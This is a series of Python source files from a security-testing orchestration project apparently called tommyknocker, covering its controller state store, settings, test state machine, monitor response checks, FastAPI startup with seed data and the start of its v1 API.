def get_monitor_by_id(self, id: UUID) -> Monitor:
raise NotImplementedError
@abstractmethod
def create_monitor(self, monitor: Monitor) -> Monitor:
raise NotImplementedError
@abstractmethod
def update_monitor(self, monitor: Monitor) -> Monitor:
raise NotImplementedError
@abstractmethod
def delete_monitor(self, id: UUID) -> None:
raise NotImplementedError
#endregion Monitor Management
#region Response Management
@abstractmethod
def list_responses(self) -> List[Response]:
raise NotImplementedError
@abstractmethod
def get_response_by_id(self, id: UUID) -> Response:
raise NotImplementedError
@abstractmethod
def create_response(self, response: Response) -> Response:
raise NotImplementedError
@abstractmethod
def update_response(self, response: Response) -> Response:
raise NotImplementedError
@abstractmethod
def delete_response(self, id: UUID) -> None:
raise NotImplementedError
#endregion Response Management
#region ResponseExpectation Management
@abstractmethod
def list_response_expectations(self) -> List[ResponseExpectation]:
raise NotImplementedError
@abstractmethod
def get_response_expectation_by_id(self, id: UUID) -> ResponseExpectation:
raise NotImplementedError
@abstractmethod
def create_response_expectation(self, response_expectation: ResponseExpectation) -> ResponseExpectation:
raise NotImplementedError
@abstractmethod
def update_response_expectation(self, response_expectation: ResponseExpectation) -> ResponseExpectation:
raise NotImplementedError
@abstractmethod
def delete_response_expectation(self, id: UUID) -> None:
raise NotImplementedError
#endregion ResponseExpectation Management
#region TestConfiguration Management
@abstractmethod
def list_test_configurations(self) -> List[TestConfiguration]:
raise NotImplementedError
@abstractmethod
def get_test_configuration_by_id(self, id: UUID) -> TestConfiguration:
raise NotImplementedError
@abstractmethod
def create_test_configuration(self, test_configuration: TestConfiguration) -> TestConfiguration:
raise NotImplementedError
@abstractmethod
def update_test_configuration(self, test_configuration: TestConfiguration) -> TestConfiguration:
raise NotImplementedError
@abstractmethod
def delete_test_configuration(self, id: UUID) -> None:
raise NotImplementedError
#endregion TestConfiguration Management
#region TestComponentStatus Management
@abstractmethod
def list_test_component_statuses(self) -> List[TestComponentStatus]:
raise NotImplementedError
@abstractmethod
def get_test_component_status_by_id(self, id: UUID) -> TestComponentStatus:
raise NotImplementedError
@abstractmethod
def create_test_component_status(self, test_component_status: TestComponentStatus) -> TestComponentStatus:
raise NotImplementedError
@abstractmethod
    def update_test_component_status(self, test_component_id: UUID, test_component_status: APIObjects.UpdatedTestComponentStatus) -> TestComponentStatus:
raise NotImplementedError
@abstractmethod
def delete_test_component_status(self, id: UUID) -> None:
raise NotImplementedError
@abstractmethod
def get_test_component_status_by_component_id(self, component_id: UUID) -> TestComponentStatus:
raise NotImplementedError
#endregion TestComponentStatus Management
#region Test Management
@abstractmethod
def list_tests(self) -> List[Test]:
raise NotImplementedError
@abstractmethod
def get_test_by_id(self, id: UUID) -> Test:
raise NotImplementedError
@abstractmethod
def create_test(self, test: Test) -> Test:
raise NotImplementedError
@abstractmethod
def update_test(self, test: Test) -> Test:
raise NotImplementedError
@abstractmethod
def delete_test(self, id: UUID) -> None:
raise NotImplementedError
@abstractmethod
def add_test_component_status(self, test_id: UUID, component_status_id: UUID) -> None:
raise NotImplementedError
@abstractmethod
def get_tests_by_knocker_id(self, knocker_id: UUID) -> List[Test]:
raise NotImplementedError
#endregion Test Management
#region TestSuite Management
@abstractmethod
def list_test_suites(self) -> List[TestSuite]:
raise NotImplementedError
@abstractmethod
def get_test_suite_by_id(self, id: UUID) -> TestSuite:
raise NotImplementedError
@abstractmethod
def create_test_suite(self, test_suite: TestSuite) -> TestSuite:
raise NotImplementedError
@abstractmethod
def update_test_suite(self, test_suite: TestSuite) -> TestSuite:
raise NotImplementedError
@abstractmethod
def delete_test_suite(self, id: UUID) -> None:
raise NotImplementedError
#endregion TestSuite Management
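# Dict-backed reference implementation: each collection is a UUID-keyed dict and
# cross-object relationships are validated eagerly on create/update.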
class InMemoryState(ControllerState):
def __init__(self):
super().__init__()
self._knockers: Dict[UUID, Knocker] = {}
self._knocks: Dict[UUID, Knock] = {}
self._runners: Dict[UUID, Runner] = {}
self._results: Dict[UUID, Result] = {}
self._monitors: Dict[UUID, Monitor] = {}
self._responses: Dict[UUID, Response] = {}
self._response_expectations: Dict[UUID, ResponseExpectation] = {}
self._test_configurations: Dict[UUID, TestConfiguration] = {}
self._test_component_statuses: Dict[UUID, TestComponentStatus] = {}
self._tests: Dict[UUID, Test] = {}
self._test_suites: Dict[UUID, TestSuite] = {}
#region Knocker Management
def list_knockers(self) -> List[Knocker]:
return list(self._knockers.values())
def get_knocker_by_id(self, id: UUID) -> Knocker:
        knocker = self._knockers.get(id, None)
if knocker:
return knocker
else:
raise NotFoundException(f"Knocker with id {id} not found")
    def create_knocker(self, knocker: APIObjects.NewKnocker) -> Knocker:
new_knocker = Knocker(**knocker.__dict__)
if new_knocker.id in self._knockers:
raise DuplicateException(f"Knocker with id {new_knocker.id} already exists")
else:
self._knockers[new_knocker.id] = new_knocker
return new_knocker
    def update_knocker(self, id: UUID, knocker: APIObjects.UpdatedKnocker) -> Knocker:
if id in self._knockers:
self._knockers[id].update(knocker)
return self._knockers[id]
else:
raise NotFoundException(f"Knocker with id {knocker.id} not found")
def delete_knocker(self, id: UUID) -> None:
if id in self._knockers:
self._knockers.pop(id)
else:
raise NotFoundException(f"Knocker with id {id} not found")
def knocker_checkin(self, id: UUID) -> None:
if id in self._knockers:
self._knockers[id].last_seen = datetime.now()
else:
raise NotFoundException(f"Knocker with id {id} not found")
#endregion Knocker Management
#region Knock Management
def validate_knock_relationships(self, knock: Knock) -> None:
for result_id in knock.result_ids:
if result_id not in self._results:
raise NotFoundException(f"Result with id {result_id} not found")
if knock.runner_id not in self._runners:
raise NotFoundException(f"Runner with id {knock.runner_id} not found")
def list_knocks(self) -> List[Knock]:
return list(self._knocks.values())
def get_knock_by_id(self, id: UUID) -> Knock:
        knock = self._knocks.get(id, None)
if knock:
return knock
else:
raise NotFoundException(f"Knock with id {id} not found")
    def create_knock(self, knock: APIObjects.NewKnock) -> Knock:
new_knock = Knock(**knock.__dict__)
if new_knock.id in self._knocks:
raise DuplicateException(f"Knock with id {new_knock.id} already exists")
self.validate_knock_relationships(new_knock)
self._knocks[new_knock.id] = new_knock
return new_knock
    def update_knock(self, id: UUID, knock: APIObjects.UpdatedKnock) -> Knock:
if id in self._knocks:
updated = self._knocks[id].clone_with_updates(knock)
self.validate_knock_relationships(updated)
self._knocks[id] = updated
return self._knocks[id]
else:
raise NotFoundException(f"Knock with id {id} not found")
def delete_knock(self, id: UUID) -> None:
if id in self._knocks:
self._knocks.pop(id)
else:
raise NotFoundException(f"Knock with id {id} not found")
#endregion Knock Management
#region Runner Management
def list_runners(self) -> List[Runner]:
return list(self._runners.values())
def get_runner_by_id(self, id: UUID) -> Runner:
runner = self._runners.get(id, None)
if runner:
return runner
else:
raise NotFoundException(f"Runner with id {id} not found")
    def create_runner(self, runner: APIObjects.NewRunner) -> Runner:
new_runner = Runner(**runner.__dict__)
if new_runner.id in self._runners:
raise DuplicateException(f"Runner with id {new_runner.id} already exists")
self._runners[new_runner.id] = new_runner
return new_runner
    def update_runner(self, id: UUID, runner: APIObjects.UpdatedRunner) -> Runner:
if id in self._runners:
self._runners[id].update(runner)
return self._runners[id]
else:
raise NotFoundException(f"Runner with id {id} not found")
def delete_runner(self, id: UUID) -> None:
if id in self._runners:
self._runners.pop(id)
else:
raise NotFoundException(f"Runner with id {id} not found")
#endregion Runner Management
#region Result Management
def list_results(self) -> List[Result]:
return list(self._results.values())
def get_result_by_id(self, id: UUID) -> Result:
result = self._results.get(id, None)
if result:
return result
else:
raise NotFoundException(f"Result with id {id} not found")
    def create_result(self, result: APIObjects.NewResult) -> Result:
new_result = Result(**result.__dict__)
if new_result.id in self._results:
raise DuplicateException(f"Result with id {new_result.id} already exists")
self._results[new_result.id] = new_result
return new_result
    def update_result(self, id: UUID, result: APIObjects.UpdatedResult) -> Result:
if id in self._results:
self._results[id].update(result)
return self._results[id]
else:
raise NotFoundException(f"Result with id {id} not found")
def delete_result(self, id: UUID) -> None:
if id in self._results:
self._results.pop(id)
else:
raise NotFoundException(f"Result with id {id} not found")
#endregion Result Management
#region Monitor Management
def list_monitors(self) -> List[Monitor]:
return list(self._monitors.values())
def get_monitor_by_id(self, id: UUID) -> Monitor:
monitor = self._monitors.get(id, None)
if monitor:
return monitor
else:
raise NotFoundException(f"Monitor with id {id} not found")
    def create_monitor(self, monitor: APIObjects.NewMonitor) -> Monitor:
new_monitor = Monitor(**monitor.__dict__)
if new_monitor.id in self._monitors:
raise DuplicateException(f"Monitor with id {new_monitor.id} already exists")
self._monitors[new_monitor.id] = new_monitor
return new_monitor
    def update_monitor(self, id: UUID, monitor: APIObjects.UpdatedMonitor) -> Monitor:
if id in self._monitors:
self._monitors[id].update(monitor)
return self._monitors[id]
else:
raise NotFoundException(f"Monitor with id {id} not found")
def delete_monitor(self, id: UUID) -> None:
if id in self._monitors:
self._monitors.pop(id)
else:
raise NotFoundException(f"Monitor with id {id} not found")
#endregion Monitor Management
#region Response Management
def validate_response_relationships(self, response: Response) -> None:
if response.monitor_id not in self._monitors:
raise NotFoundException(f"Monitor with id {response.monitor_id} not found")
def list_responses(self) -> List[Response]:
return list(self._responses.values())
def get_response_by_id(self, id: UUID) -> Response:
response = self._responses.get(id, None)
if response:
return response
else:
raise NotFoundException(f"Response with id {id} not found")
    def create_response(self, response: APIObjects.NewResponse) -> Response:
new_response = Response(**response.__dict__)
if new_response.id in self._responses:
raise DuplicateException(f"Response with id {new_response.id} already exists")
self.validate_response_relationships(new_response)
self._responses[new_response.id] = new_response
return new_response
    def update_response(self, id: UUID, response: APIObjects.UpdatedResponse) -> Response:
if id in self._responses:
updated = self._responses[id].clone_with_updates(response)
self.validate_response_relationships(updated)
self._responses[id] = updated
return self._responses[id]
else:
raise NotFoundException(f"Response with id {response.id} not found")
def delete_response(self, id: UUID) -> None:
if id in self._responses:
self._responses.pop(id)
else:
raise NotFoundException(f"Response with id {id} not found")
#endregion Response Management
#region ResponseExpectation Management
def validate_response_expectation_relationships(self, response_expectation: ResponseExpectation) -> None:
if response_expectation.response_id not in self._responses:
raise NotFoundException(f"Response with id {response_expectation.response_id} not found")
def list_response_expectations(self) -> List[ResponseExpectation]:
return list(self._response_expectations.values())
def get_response_expectation_by_id(self, id: UUID) -> ResponseExpectation:
response_expectation = self._response_expectations.get(id, None)
if response_expectation:
return response_expectation
else:
raise NotFoundException(f"ResponseExpectation with id {id} not found")
    def create_response_expectation(self, response_expectation: APIObjects.NewResponseExpectation) -> ResponseExpectation:
new_response_expectation = ResponseExpectation(**response_expectation.__dict__)
if new_response_expectation.id in self._response_expectations:
raise DuplicateException(f"ResponseExpectation with id {new_response_expectation.id} already exists")
self.validate_response_expectation_relationships(new_response_expectation)
self._response_expectations[new_response_expectation.id] = new_response_expectation
return new_response_expectation
    def update_response_expectation(self, id: UUID, response_expectation: APIObjects.UpdatedResponseExpectation) -> ResponseExpectation:
if id in self._response_expectations:
updated = self._response_expectations[id].clone_with_updates(response_expectation)
self.validate_response_expectation_relationships(updated)
self._response_expectations[id] = updated
return self._response_expectations[id]
else:
raise NotFoundException(f"ResponseExpectation with id {id} not found")
def delete_response_expectation(self, id: UUID) -> None:
if id in self._response_expectations:
self._response_expectations.pop(id)
else:
raise NotFoundException(f"ResponseExpectation with id {id} not found")
#endregion ResponseExpectation Management
#region TestConfiguration Management
def validate_test_configuration_relationships(self, test_configuration: TestConfiguration) -> None:
for knock_id in test_configuration.knock_ids:
if knock_id not in self._knocks:
raise NotFoundException(f"Knock with id {knock_id} not found")
for response_expectation_id in test_configuration.response_expectation_ids:
if response_expectation_id not in self._response_expectations:
raise NotFoundException(f"ResponseExpectation with id {response_expectation_id} not found")
def list_test_configurations(self) -> List[TestConfiguration]:
return list(self._test_configurations.values())
def get_test_configuration_by_id(self, id: UUID) -> TestConfiguration:
test_configuration = self._test_configurations.get(id, None)
if test_configuration:
return test_configuration
else:
raise NotFoundException(f"TestConfiguration with id {id} not found")
    def create_test_configuration(self, test_configuration: APIObjects.NewTestConfiguration) -> TestConfiguration:
new_test_configuration = TestConfiguration(**test_configuration.__dict__)
if new_test_configuration.id in self._test_configurations:
raise DuplicateException(f"TestConfiguration with id {new_test_configuration.id} already exists")
self.validate_test_configuration_relationships(new_test_configuration)
self._test_configurations[new_test_configuration.id] = new_test_configuration
return new_test_configuration
    def update_test_configuration(self, id: UUID, test_configuration: APIObjects.UpdatedTestConfiguration) -> TestConfiguration:
if id in self._test_configurations:
updated = self._test_configurations[id].clone_with_updates(test_configuration)
self.validate_test_configuration_relationships(updated)
self._test_configurations[id] = updated
return self._test_configurations[id]
else:
raise NotFoundException(f"TestConfiguration with id {id} not found")
def delete_test_configuration(self, id: UUID) -> None:
if id in self._test_configurations:
self._test_configurations.pop(id)
else:
raise NotFoundException(f"TestConfiguration with id {id} not found")
    def get_latest_runs_by_test_configuration_id(self, id: UUID, count: int):
        tests = [test for test in self._tests.values() if test.configuration_id == id]
        # Unfinished tests have no end time; treat them as oldest so completed runs sort first
        tests.sort(key=lambda x: x.ended or datetime.min, reverse=True)
        return tests[:count]
#endregion TestConfiguration Management
#region TestComponentStatus Management
def validate_test_component_status_relationships(self, test_component_status: TestComponentStatus) -> None:
if test_component_status.component_id not in self._knocks and test_component_status.component_id not in self._responses:
raise NotFoundException(f"Id {test_component_status.component_id} does not match any known Knocks or Responses")
def list_test_component_statuses(self) -> List[TestComponentStatus]:
return list(self._test_component_statuses.values())
def get_test_component_status_by_id(self, id: UUID) -> TestComponentStatus:
test_component_status = self._test_component_statuses.get(id, None)
if test_component_status:
return test_component_status
else:
raise NotFoundException(f"TestComponentStatus with id {id} not found")
    def create_test_component_status(self, test_component_status: APIObjects.NewTestComponentStatus) -> TestComponentStatus:
new_test_component_status = TestComponentStatus(**test_component_status.__dict__)
if new_test_component_status.id in self._test_component_statuses:
raise DuplicateException(f"TestComponentStatus with id {new_test_component_status.id} already exists")
new_test_component_status.updated = datetime.now()
self.validate_test_component_status_relationships(new_test_component_status)
self._test_component_statuses[new_test_component_status.id] = new_test_component_status
return new_test_component_status
    def update_test_component_status(self, test_component_id: UUID, test_component_status: APIObjects.UpdatedTestComponentStatus) -> TestComponentStatus:
if test_component_id in self._test_component_statuses:
self._test_component_statuses[test_component_id].status = test_component_status.status
self._test_component_statuses[test_component_id].updated = datetime.now()
return self._test_component_statuses[test_component_id]
else:
raise NotFoundException(f"TestComponentStatus with id {test_component_status.id} not found")
def delete_test_component_status(self, id: UUID) -> None:
if id in self._test_component_statuses:
self._test_component_statuses.pop(id)
else:
raise NotFoundException(f"TestComponentStatus with id {id} not found")
def get_test_component_status_by_component_id(self, component_id: UUID) -> TestComponentStatus:
for test_component_status in self._test_component_statuses.values():
if test_component_status.component_id == component_id:
return test_component_status
raise NotFoundException(f"TestComponentStatus with component_id {component_id} not found")
def get_test_component_statuses_by_test_id(self, test_id: UUID) -> List[TestComponentStatus]:
test = self.get_test_by_id(test_id)
return [self._test_component_statuses[component_status_id] for component_status_id in test.component_status_ids]
#endregion TestComponentStatus Management
#region Test Management
def validate_test_relationships(self, test: Test) -> None:
if test.configuration_id not in self._test_configurations:
raise NotFoundException(f"TestConfiguration with id {test.configuration_id} not found")
if test.knocker_id not in self._knockers:
raise NotFoundException(f"Knocker with id {test.knocker_id} not found")
for component_status_id in test.component_status_ids:
if component_status_id not in self._test_component_statuses:
raise NotFoundException(f"TestComponentStatus with id {component_status_id} not found")
def list_tests(self) -> List[Test]:
return list(self._tests.values())
def get_test_by_id(self, id: UUID) -> Test:
test = self._tests.get(id, None)
if test:
return test
else:
raise NotFoundException(f"Test with id {id} not found")
    def create_test(self, test: APIObjects.NewTest) -> Test:
new_test = Test(**test.__dict__)
if new_test.id in self._tests:
raise DuplicateException(f"Test with id {new_test.id} already exists")
self.validate_test_relationships(new_test)
self._tests[new_test.id] = new_test
return new_test
    def update_test(self, id: UUID, test: APIObjects.UpdatedTest) -> Test:
if id in self._tests:
updated = self._tests[id].clone_with_updates(test)
self.validate_test_relationships(updated)
self._tests[id] = updated
return self._tests[id]
else:
raise NotFoundException(f"Test with id {id} not found")
def delete_test(self, id: UUID) -> None:
if id in self._tests:
self._tests.pop(id)
else:
raise NotFoundException(f"Test with id {id} not found")
def get_tests_by_knocker_id(self, knocker_id: UUID) -> List[Test]:
return [test for test in self._tests.values() if test.knocker_id == knocker_id]
def add_test_component_status(self, test_id: UUID, component_status_id: UUID) -> None:
if test_id in self._tests:
self._tests[test_id].component_status_ids.append(component_status_id)
return self._tests[test_id]
else:
raise NotFoundException(f"Test with id {test_id} not found")
def get_tests_by_status(self, status: TestStatus) -> List[Test]:
return [test for test in self._tests.values() if test.status == status]
def get_running_tests(self) -> List[Test]:
return [test for test in self._tests.values() if test.status in (TestStatus.KNOCKING, TestStatus.CHECKING)]
def get_completed_tests(self) -> List[Test]:
return [test for test in self._tests.values() if test.status in (TestStatus.SUCCESS, TestStatus.FAILURE, TestStatus.ERROR)]
#endregion Test Management
#region TestSuite Management
def validate_test_suite_relationships(self, test_suite: TestSuite) -> None:
for test_configuration_id in test_suite.test_configuration_ids:
if test_configuration_id not in self._test_configurations:
raise NotFoundException(f"TestConfiguration with id {test_configuration_id} not found")
def list_test_suites(self) -> List[TestSuite]:
return list(self._test_suites.values())
def get_test_suite_by_id(self, id: UUID) -> TestSuite:
test_suite = self._test_suites.get(id, None)
if test_suite:
return test_suite
else:
raise NotFoundException(f"TestSuite with id {id} not found")
    def create_test_suite(self, test_suite: APIObjects.NewTestSuite) -> TestSuite:
new_test_suite = TestSuite(**test_suite.__dict__)
if new_test_suite.id in self._test_suites:
raise DuplicateException(f"TestSuite with id {new_test_suite.id} already exists")
self.validate_test_suite_relationships(new_test_suite)
self._test_suites[new_test_suite.id] = new_test_suite
return new_test_suite
    def update_test_suite(self, id: UUID, test_suite: APIObjects.UpdatedTestSuite) -> TestSuite:
if id in self._test_suites:
updated = self._test_suites[id].clone_with_updates(test_suite)
self.validate_test_suite_relationships(updated)
self._test_suites[id] = updated
return self._test_suites[id]
else:
raise NotFoundException(f"TestSuite with id {id} not found")
def delete_test_suite(self, id: UUID) -> None:
if id in self._test_suites:
self._test_suites.pop(id)
else:
raise NotFoundException(f"TestSuite with id {id} not found")
def get_test_configurations_in_suite(self, suite_id: UUID) -> List[TestConfiguration]:
return [test for test in self._test_configurations.values() if test.id in self._test_suites[suite_id].test_configuration_ids]
def get_uncategorized_test_configurations(self) -> List[TestConfiguration]:
return [test for test in self._test_configurations.values() if not any(test.id in test_suite.test_configuration_ids for test_suite in self._test_suites.values())]
#endregion TestSuite Management
class PersistentInMemoryState(InMemoryState):
def __init__(self):
super().__init__()
self.load()
asyncio.get_running_loop().create_task(self.ongoing_save())
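    # Snapshot the entire state to disk every 10 seconds; coarse, but it keeps
    # persistence independent of individual mutations.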
async def ongoing_save(self):
while True:
await asyncio.sleep(10)
await self.save()
async def save(self):
with open(app_settings.state_file, "wb") as f:
pickle.dump(self, f)
    def load(self):
        try:
            with open(app_settings.state_file, "rb") as f:
                state = pickle.load(f)
            self.__dict__.update(state.__dict__)
        except (FileNotFoundError, EOFError, pickle.UnpicklingError):
            # No usable saved state on disk; start fresh
            pass
class ControllerStateFactory:
_state: ControllerState = None
_state_type: type = InMemoryState
@classmethod
def set_state_type(cls, state_type: type):
cls._state_type = state_type
@classmethod
def get_state(cls) -> ControllerState:
if not cls._state:
cls._state = cls._state_type()
return cls._state | 32,304 | Python | .py | 646 | 40.619195 | 170 | 0.685913 | loredous/tommyknocker | 8 | 0 | 9 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,543 | settings.py | loredous_tommyknocker/src/python/controller/settings.py | from pydantic_settings import BaseSettings
class Settings(BaseSettings):
debug: bool = False
seed_for_testing: bool = False
state_type: str = "memory"
state_file: str = "state.pkl"
statemachines_file: str = "statemachines.pkl"
file_state_path: str = "."
app_settings = Settings() | 308 | Python | .py | 9 | 30.111111 | 50 | 0.703704 | loredous/tommyknocker | 8 | 0 | 9 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,544 | statemachines.py | loredous_tommyknocker/src/python/controller/statemachines.py | import datetime
from typing import Any, List
from statemachine import State, StateMachine
from controller.state import ControllerStateFactory
from shared.models.objects import Test, TestConfiguration, ResponseExpectation, TestComponentStatus
from shared.models.enums import ComponentStatus, ComponentType, TestStatus
from controller.response import ExpectedResponse
from shared.models.apiobjects import UpdatedTestComponentStatus
from logging import getLogger
class TestStateMachine(StateMachine):
pending = State(initial=True)
knocking = State()
checking = State()
success = State(final=True)
failure = State(final=True)
error = State(final=True)
test: Test = None
expected_responses: List[ExpectedResponse]
cycle = (pending.to(knocking, cond="picked_up") | knocking.to(checking, cond="knocking_complete") | checking.to(success, cond="check_successful"))
    failed = checking.to(failure)
errored = (pending.to(error) | knocking.to(error) | checking.to(error))
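    # Lifecycle: pending -> knocking -> checking -> success; `failed` and
    # `errored` divert to their terminal states.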
def __init__(self, test: Test, model: Any = None, state_field: str = "state", start_value: Any = None, rtc: bool = True, allow_event_without_transition: bool = False):
super().__init__(model, state_field, start_value, rtc, allow_event_without_transition)
self.logger = getLogger(__name__)
self.expected_responses = []
self.test = test
self.controller_state = ControllerStateFactory.get_state()
    def picked_up(self) -> bool:
        config = self.controller_state.get_test_configuration_by_id(self.test.configuration_id)
        tc_statuses = [self.controller_state.get_test_component_status_by_id(component_id) for component_id in self.test.component_status_ids]
        return len(tc_statuses) == len(config.knock_ids)
def on_enter_knocking(self):
self.test = self.controller_state.get_test_by_id(self.test.id)
self.test.started = datetime.datetime.utcnow()
self.test.status = TestStatus.KNOCKING
self.controller_state.update_test(self.test.id, self.test)
    def knocking_complete(self) -> bool:
        tc_statuses = [self.controller_state.get_test_component_status_by_id(component_id) for component_id in self.test.component_status_ids]
        test_config = self.controller_state.get_test_configuration_by_id(self.test.configuration_id)
        if len(tc_statuses) != len(test_config.knock_ids):
            return False
        return all(tc_status.status == ComponentStatus.SUCCESS for tc_status in tc_statuses)
def on_enter_checking(self):
self.test = self.controller_state.get_test_by_id(self.test.id)
self.test.status = TestStatus.CHECKING
self.controller_state.update_test(self.test.id, self.test)
self.populate_response_testcomponents()
def populate_response_testcomponents(self):
self.test = self.controller_state.get_test_by_id(self.test.id)
config = self.controller_state.get_test_configuration_by_id(self.test.configuration_id)
response_expectations = [self.controller_state.get_response_expectation_by_id(response_expectation) for response_expectation in config.response_expectation_ids]
for expectation in response_expectations:
component_status = TestComponentStatus(component_id=expectation.response_id, component_type=ComponentType.RESPONSE, status=ComponentStatus.PENDING)
self.controller_state.create_test_component_status(component_status)
self.controller_state.add_test_component_status(self.test.id, component_status.id)
self.expected_responses.append(ExpectedResponse(expectation))
def check_successful(self) -> bool:
self.check_responses()
self.test = self.controller_state.get_test_by_id(self.test.id)
tc_statuses = [self.controller_state.get_test_component_status_by_id(component_id) for component_id in self.test.component_status_ids]
if all(tc_status.status == ComponentStatus.SUCCESS for tc_status in tc_statuses):
self.test.ended = datetime.datetime.utcnow()
self.test.status = TestStatus.SUCCESS
elif any(tc_status.status == ComponentStatus.ERROR for tc_status in tc_statuses):
self.send("errored")
self.test.ended = datetime.datetime.utcnow()
self.test.status = TestStatus.ERROR
elif any(tc_status.status == ComponentStatus.FAILURE for tc_status in tc_statuses):
self.send("failed")
self.test.ended = datetime.datetime.utcnow()
self.test.status = TestStatus.FAILURE
self.controller_state.update_test(self.test.id, self.test)
return self.test.status == TestStatus.SUCCESS
def check_responses(self):
component_statuses = self.controller_state.get_test_component_statuses_by_test_id(self.test.id)
for expected_response in self.expected_responses:
try:
component_status = [status for status in component_statuses if status.component_id == expected_response.expectation.response_id].pop()
if component_status.status not in [ComponentStatus.FAILURE, ComponentStatus.SUCCESS, ComponentStatus.ERROR]:
status = UpdatedTestComponentStatus(status=ComponentStatus.ERROR)
try:
if expected_response.check_response():
status.status = ComponentStatus.SUCCESS
                        elif expected_response.expectation.timeout < (datetime.datetime.utcnow() - self.test.started).total_seconds():
status.status = ComponentStatus.FAILURE
except Exception as e:
self.logger.exception("Exception occurred while checking response", e)
status.status = ComponentStatus.ERROR
self.controller_state.update_test_component_status(component_status.id, status)
except IndexError:
self.logger.error(f"Expected response {expected_response.response.id} not found in component statuses")
pass | 6,112 | Python | .py | 92 | 55.98913 | 171 | 0.700619 | loredous/tommyknocker | 8 | 0 | 9 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,545 | response.py | loredous_tommyknocker/src/python/controller/response.py | from shared.models.objects import ResponseExpectation
from controller.monitor import MockMonitor, ElasticsearchMonitor
from controller.state import ControllerStateFactory
class ExpectedResponse:
    expectation: ResponseExpectation
def __init__(self, expectation: ResponseExpectation):
self.expectation = expectation
self.state = ControllerStateFactory.get_state()
def check_response(self) -> bool:
response = self.state.get_response_by_id(self.expectation.response_id)
monitor = self.state.get_monitor_by_id(response.monitor_id)
if monitor.type == "elasticsearch":
monitor = ElasticsearchMonitor(monitor)
elif monitor.type == "mock":
monitor = MockMonitor(monitor)
else:
raise ValueError(f"Monitor type {monitor.type} is not supported")
results = monitor.query_monitor(**response.monitor_parameters)
return bool(results) == self.expectation.expected
| 1,068 | Python | .py | 21 | 43.142857 | 78 | 0.735867 | loredous/tommyknocker | 8 | 0 | 9 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,546 | controller.py | loredous_tommyknocker/src/python/controller/controller.py | import asyncio
from datetime import datetime
import logging
from uuid import UUID
from fastapi import FastAPI
from fastapi.concurrency import asynccontextmanager
from controller.state import ControllerStateFactory, InMemoryState, PersistentInMemoryState
from controller.v1api import v1APIRouter
from shared.models.objects import Knocker, Monitor, ResponseExpectation, Runner, Result, ResultType, Knock, TestConfiguration, Test, Response
from controller.dependency import ActiveStateMachinesFactory
from controller.settings import app_settings
def seed_data():
controller_state = ControllerStateFactory.get_state()
active_state_machines = ActiveStateMachinesFactory.get_active_state_machines()
knocker = controller_state.create_knocker(Knocker(name="Test Knocker", description="A pre-seeded knocker for testing", last_seen=datetime.now(), id=UUID("00000000-0000-0000-0000-000000000001")))
runner = controller_state.create_runner(Runner(name="Debian Test Runner", description="A runner for testing, based on the latest Debian image", image_name="debian", image_tag="latest"))
result_exit_code = controller_state.create_result(Result(type=ResultType.EXIT_CODE, value="0"))
result_output = controller_state.create_result(Result(type=ResultType.PRESENT_IN_OUTPUT, value="Hello World!"))
knock = controller_state.create_knock(Knock(name="Test Knock", runner_id=runner.id, command="echo 'Hello World!'", description="A pre-seeded knock for testing", result_ids=[result_exit_code.id, result_output.id]))
    monitor = controller_state.create_monitor(Monitor(name="Test Monitor", description="A pre-seeded monitor for testing", type=MonitorType.MOCK))
response = controller_state.create_response(Response(name="Test Response", description="A pre-seeded response for testing", monitor_id=monitor.id, monitor_parameters={"response": True}))
response_expectation = controller_state.create_response_expectation(ResponseExpectation(response_id=response.id, expected=True, timeout=90))
test_configuration = controller_state.create_test_configuration(TestConfiguration(name="Test Configuration", description="A pre-seeded test configuration for testing", knock_ids=[knock.id], response_expectation_ids=[response_expectation.id]))
test = controller_state.create_test(Test(configuration_id=test_configuration.id, knocker_id=knocker.id))
active_state_machines.add_state_machine_for_test(test)
if app_settings.debug:
logging.basicConfig(level=logging.DEBUG)
logger = logging.getLogger(__name__)
active_state_machines = ActiveStateMachinesFactory.get_active_state_machines()
async def update_statemachines():
await asyncio.sleep(5)
while True:
logger.debug("Cycling state machines")
await active_state_machines.cycle_state_machines()
await asyncio.sleep(5)
@asynccontextmanager
async def lifespan(app: FastAPI):
update_task = asyncio.get_running_loop().create_task(update_statemachines())
set_state_type(app_settings.state_type)
controller_state = ControllerStateFactory.get_state()
if controller_state.list_knockers() == [] and app_settings.seed_for_testing:
seed_data()
yield
update_task.cancel()
def set_state_type(state_type: str):
    match state_type:
case "memory":
ControllerStateFactory.set_state_type(InMemoryState)
case "file":
ControllerStateFactory.set_state_type(PersistentInMemoryState)
case _:
ControllerStateFactory.set_state_type(InMemoryState)
api = FastAPI(lifespan=lifespan)
api.include_router(v1APIRouter)
| 3,686 | Python | .py | 55 | 62.436364 | 246 | 0.780818 | loredous/tommyknocker | 8 | 0 | 9 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,547 | v1api.py | loredous_tommyknocker/src/python/controller/v1api.py | from dataclasses import asdict
from typing import List
from uuid import UUID
from fastapi import APIRouter
import shared.models.objects as StateObjects
import shared.models.apiobjects as APIObjects
from shared.models.enums import TestStatus
from controller.dependency import ActiveStateMachinesDependency, ControllerStateDependency
v1APIRouter = APIRouter(prefix="/api/v1")
#region Knocker Management
@v1APIRouter.get("/knockers", tags=["Knockers"])
def list_knockers(controller_state: ControllerStateDependency) -> List[StateObjects.Knocker]:
return controller_state.list_knockers()
@v1APIRouter.get("/knockers/{id}", tags=["Knockers"])
def get_knocker_by_id(id: UUID, controller_state: ControllerStateDependency) -> StateObjects.Knocker:
return controller_state.get_knocker_by_id(id)
@v1APIRouter.post("/knockers", tags=["Knockers"])
def create_knocker(knocker: APIObjects.NewKnocker, controller_state: ControllerStateDependency) -> StateObjects.Knocker:
return controller_state.create_knocker(StateObjects.Knocker(**asdict(knocker)))
@v1APIRouter.put("/knockers/{id}", tags=["Knockers"])
def update_knocker(id: UUID, controller_state: ControllerStateDependency, knocker: APIObjects.UpdatedKnocker) -> StateObjects.Knocker:
return controller_state.update_knocker(id, knocker)
@v1APIRouter.delete("/knockers/{id}", tags=["Knockers"])
def delete_knocker(id: UUID, controller_state: ControllerStateDependency) -> None:
controller_state.delete_knocker(id)
@v1APIRouter.post("/knockers/{id}/checkin", tags=["Knockers"])
